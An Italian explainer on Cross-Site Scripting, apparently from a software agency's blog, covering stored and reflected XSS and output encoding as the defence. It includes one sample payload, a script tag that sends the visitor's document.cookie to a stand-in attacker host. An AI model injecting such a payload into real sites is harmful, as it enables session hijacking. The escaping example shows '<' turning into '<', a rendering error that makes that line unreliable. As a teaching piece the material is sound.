Il Cross-Site Scripting (XSS) è una delle vulnerabilità web più diffuse. Si verifica quando un'applicazione web permette a un utente malintenzionato di "iniettare" codice lato client (solitamente JavaScript) in una pagina web visualizzata da altri utenti.
Come Funziona un Attacco XSS?
Immagina una sezione commenti di un blog che non valida correttamente l'input. Un hacker, invece di scrivere un normale commento, scrive:
<script>document.location='http://sito-hacker.com/steal?cookie=' + document.cookie;</script>L'applicazione salva questo "commento" nel database. Ora, ogni volta che un utente visita la pagina e carica quel commento, il suo browser eseguirà lo script malevolo. Lo script ruberà il cookie di sessione dell'utente e lo invierà al sito dell'hacker, che potrà così impersonare l'utente e accedere al suo account.
Tipi di XSS
- Stored XSS (Persistente): Lo script malevolo è salvato permanentemente sul server (es. in un commento, in un post del forum) e viene eseguito da ogni utente che visita la pagina. È il tipo più pericoloso.
- Reflected XSS (Riflesso): Lo script viene "riflesso" dal server in risposta a una richiesta. Di solito, l'hacker deve convincere la vittima a cliccare su un link appositamente creato.
Come Prevenire l'XSS
La regola d'oro è: non fidarsi mai dell'input dell'utente. La difesa principale è l'Output Encoding. Quando si visualizzano dati forniti da un utente in una pagina HTML, bisogna sempre "sanitizzarli" o "codificarli" (escaping) in modo che il browser li interpreti come semplice testo e non come codice eseguibile. Ad esempio, il carattere `<` deve essere trasformato nella sua entità HTML `<`. Le moderne librerie di templating (Blade, Twig, React) lo fanno automaticamente, ma è fondamentale essere consapevoli del rischio.
Hai bisogno di una soluzione su misura?
Dalla Web App al gestionale custom, trasformiamo le tue idee in software performante. Contattaci per una consulenza gratuita.
Richiedi una consulenza